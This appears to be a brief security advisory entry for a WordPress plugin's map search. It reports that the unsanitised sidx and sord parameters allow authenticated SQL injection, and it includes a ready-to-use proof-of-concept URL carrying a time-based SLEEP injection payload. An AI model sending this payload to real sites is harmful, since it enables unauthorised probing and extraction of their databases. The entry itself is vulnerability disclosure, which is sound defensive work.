The GET parameters sidx and sord were used in a SQL statement without being sanitised when searching for maps in the dashboard, leading to an authenticated SQL Injection issues.
https://example.com/wp-admin/admin-ajax.php?mod=maps&action=getListForTbl&pl=ums&reqType=ajax&search%5Btext_like%5D=a&_search=false&nd=1612781069571&rows=10&page=0&sord=desc&sidx=id%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)
2021-02-08 (about 1 years ago)
2021-02-08 (about 1 years ago)
2021-02-10 (about 1 years ago)